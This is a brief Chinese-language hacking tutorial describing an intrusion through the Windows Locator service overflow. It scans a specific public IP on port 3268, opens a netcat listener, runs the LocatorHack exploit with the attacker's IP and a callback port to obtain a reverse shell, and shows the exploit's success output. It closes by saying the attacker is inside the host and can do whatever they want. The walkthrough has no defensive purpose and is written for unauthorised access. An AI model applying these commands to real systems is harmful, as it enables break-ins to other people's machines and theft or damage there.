本文是记录一次利用LOCATOR漏洞的入侵主机的全部过程!
首先利用扫描工具检测服务器的3268端口,看是否有此项服务!
这里我们用SUPER SCAN这个工具 [原因:比较小而且方便]
大家可见了 这台机子存在服务 211.167.146.250
好了
开始实战演练
首先要利用我们强大的NC [NET CAT] 来监听一个端口
格式如下: nc -vv -l -p 94 [94 是随便的可根据你的习惯更改 但是不要占用WIN的默认使用端就行]
然后进行溢出 并让漏洞机自动连接我们
这里我们利用sunx的LOCATORHACK这个溢出工具
其具体格式如下:
LocatorHack -h 192.168.0.1 -v 3 -l 1 -s 0 -r 127.0.0.1 -p 99
溢出程序名 -H 漏洞IP -V 主机类型 -l 主机语言 -S 应该是SP的版本
-R 本机IP - P 溢出后的端口[自主选择当然是要用和你监听的同一个端口]
好了由此的出我们这次的格式
好开始了
溢出后会看到如下结果
connect socket....
connect smb...
open namedpipe...
bind rpc...
call rpc...
Overflowed, 211.167.146.250:95
good luck
好了我们来看看刚才NC监听的CMD
呵呵
我们已经进去了!
接下来想干什么就有你决定了